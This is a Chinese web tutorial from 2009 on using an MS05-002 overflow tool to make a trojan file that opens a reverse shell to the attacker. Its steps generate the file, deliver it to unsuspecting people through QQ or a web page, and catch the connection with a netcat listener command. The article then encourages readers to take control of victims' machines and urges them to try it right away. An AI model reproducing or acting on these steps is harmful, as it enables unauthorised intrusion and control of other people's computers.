当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客如何利用Ms05002溢出找“肉鸡”

安全基础
入侵常用TCP端口作用及其操作建议之二十九
玩转XP系统中的一些另类卸载
移动硬盘常见问题的解决(1)
移动硬盘常见问题的解决(2)
使用RSS能做的十六件事
Win XP系统19例常见问题(1)
Win XP系统19例常见问题(2)
Win XP系统19例常见问题(3)
Win XP系统19例常见问题(4)
企业安全管理从IP地址开始
计算机取证常识
深入剖析EFS
WinXP另类垃圾的清理(1)
WinXP另类垃圾的清理(2)
WinXP另类垃圾的清理(3)
WinXP另类垃圾的清理(4)
给Windows XP标题栏瘦瘦身
体验Windows XP的网络视频会议(1)
体验Windows XP的网络视频会议(2)
交换网络中的嗅探和ARP欺骗

安全基础 中的 黑客如何利用Ms05002溢出找“肉鸡”


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 103 ::
收藏到网摘: n/a

 

  溢出攻击永远是安全界中,不可忽视的角色。而如今也正是肉鸡短缺的年代,能掌握一门最新的Ms05002溢出,必定会让你有“惊人”的收获。至于熟练的溢出如何炼成?具体方法请见下文所示!

  实施方法:通过Ms05002攻击工具,溢出反弹IP、反弹端口,会生成含有木马性质的文件。然后将这个产生的文件,以QQ传输的形式发给受害者观看,或者将其上传到自己的主页空间,引诱其他人访问。最后执行NC瑞士军刀,监听本机端口,收取已经运行产生文件的主机。

  步骤1.首先从网上下载Ms05002溢出工具,释放到比较理想的硬盘驱动器中,然后在CMD命令行下,输入软件名称启动该程序,会出现一些英文形式的帮助信息(如图1)。

  小提示:Ms05002溢出工具,是一款需要在命令行下支持运行的程序,它可以通过溢出反弹的IP地址,生成木马服务端。这点与其他溢出程序是完全不同,而且效率相比之下,也有明显的提高,真不愧是即所有溢出程序的升级版本。

  步骤2.继续在其下的命令行处,输入命令Ms05002 要生成的木马文件名 本地机器IP地址 溢出端口(如图2),然后敲击“回车键”执行。屏幕会不停的向上滚动,这时还会出现带有两句“OK”的字母提示,说明木马文件已经生成完毕了。



图 2

  步骤3.通常溢出过后,都需要监听工具来抓捕肉鸡。这里也不例外,跳转到事先准备的NC工具所在目录,然后在其命令行处输入NC –VV –L –P 1984的监听命令,并敲击“回车”键,开始监听本地1984端口的信息出入。

  小提示:NC监听软件-VV参数代表,得到更详细的输入监听内容。-L代表连接端口关闭后,仍然继续监听。-P进行监听本地端口,后跟数字就是所要监听的端口号。

  步骤4.将溢出生成的木马,以QQ形式发给网友运行,或者上传到自己的个人空间中,骗取受害者浏览运行。如果用户不幸查看所发去的木马,正在本机监听的NC等待状况,就会改为可操作命令行(如图3)。而此时的命令操作平台,也正是远方主机的SHELL平台(有关SHELL的解释,已经在前几篇文章中叙述过,这里就不做过多讲解了),现在你就可以在其主机上,为所欲为的以命令形式操控机器。



图 3

  结束语:最快捷和最灵验的“抓鸡”方法,已经摆在您面前了。还在犹豫什么?赶快前去一试此妙法吧!